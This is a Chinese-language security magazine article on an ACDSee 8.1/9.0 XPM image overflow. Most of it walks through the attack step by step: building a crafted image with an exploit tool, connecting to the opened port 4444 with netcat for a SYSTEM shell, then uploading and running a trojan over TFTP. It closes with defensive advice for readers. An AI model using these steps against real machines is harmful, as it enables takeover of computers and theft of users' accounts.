如果給你一張圖片,並告訴你它可以黑你,你首先想到的是不是這張圖片捆綁了木馬?你會這麼想不無道理,因為這種古老的圖片抓雞法大多的變化都是在捆綁木馬上,幾乎沒有打過圖片的主意。但是這種全新超隱蔽的圖片抓雞法,在今年9月誕生了,在駭客圈中廣為流傳。它利用的就是ACDSee軟體(8.1和9.0)。在裝機時一般都會預裝一些常用軟體,不少朋友可能就裝有ACDSee軟體,這樣就給了駭客可乘之機。你也許會有疑問,不捆綁木馬,圖片是怎麼黑我的?看完本文,你就全明白了。
隱蔽在ACDSee圖片中的黑手
普通的圖片抓雞法就是在圖片上捆綁木馬,然後再傳播。這種方法雖然還有人用,但是成功率已經不高了,因為很容易第一時間就被發現。
現在,一種最新的圖片抓雞法正在駭客圈中流傳,它的原理就是利用數字圖像處理軟體ACDSeeID_X.apl插件在處理內部結構錯誤的XPM檔時,如果部分字串大於4096位元組的話就會觸發溢出。
駭客首先利用最近才在網路上流傳的專用工具創建一張特殊圖片,接著通過各種方法將該圖片發送出去。用戶受騙打開了該圖片就會啟動4444端口,駭客就可以通過溢出上傳木馬程式。一旦上傳的木馬程式成功運行後,用戶的電腦就會變成“肉雞”,遊戲帳號、QQ等就會被盜。
ACDSee是怎樣被用來抓雞的
1.創建特殊圖片
點擊開始菜單中的“運行”命令,輸入“cmd”打開命令提示符窗口,然後跳轉到ACDSee漏洞利用工具的所在目錄。首先輸入該工具名稱查看其使用方法,從中看到該工具有兩種使用方法。這裏我們輸入:xmp 1 test.xmp回車(圖1),這樣即可創建一張特殊圖片。
2.盜取System許可權
首先將圖片檔發送出去,當用戶雙擊打開該檔時,就會在遠程系統打開4444的端口。現在打開另外一個命令提示符窗口,使用命令“nc -vv 遠程IP地址 4444”來進行連接。這時用駭客工具NC就會得到溢出的結果並獲得System的許可權(圖2)。
3.上傳木馬抓雞
現在先準備一個木馬程式mm.exe,接著運行Tftpd32來架設一個伺服器。點擊“設置”按鈕設置木馬的所在目錄以及本機IP地址就可以了。
現在切換到System許可權的命令提示符窗口,直接輸入“tftp -i 本地IP get 遠程IP mm.exe”即可。上傳完成後運行“start mm.exe”命令執行木馬程式,連接成功後肉雞就到手了,以後就可以為所欲為了。
防範技巧
技巧1:不要隨便接收陌生人的任何檔,也不要下載那些不知情的檔。很多人以為只有可疑的應用程式才有危險,實際上任何檔都可能成為駭客入侵的幫手。
技巧2:將系統中的ACDSee更新到9.1以上版本(8.1和9.0版本的有這個漏洞),或一些經典但較老的軟體版本。因為最新的軟體版本已經修復了該漏洞,而老的版本並不存在該漏洞。
技巧3:利用系統自帶的網路防火牆或者第三方的網路防火牆,對溢出時利用的4444端口進行封堵。這樣就算是漏洞被啟動,也不可能被駭客所控制利用。
防抓雞系列小結
通過這麼多期抓雞系列的介紹,我們可以看到駭客抓雞的手法靈活多變,既有利用常用軟體溢出抓雞的,又有通過端口抓雞的,還有巧用迅雷發佈抓雞的。不管抓雞方式怎麼變,防範的思路基本上變化不大。
首先要確保各種系統和常用軟體漏洞的修補,這段時間很多駭客都在尋找常用軟體的漏洞,大家一定要注意常用軟體的更新。其次,要及時更新殺毒軟體並使用一些查殺木馬能力較強的安全工具,如EWIDO(下載地址:http://www.cpcw.com/bzsoft)。最後,一定要記住不放心的檔不打開,不正規的網站不去,提高安全意識。 |
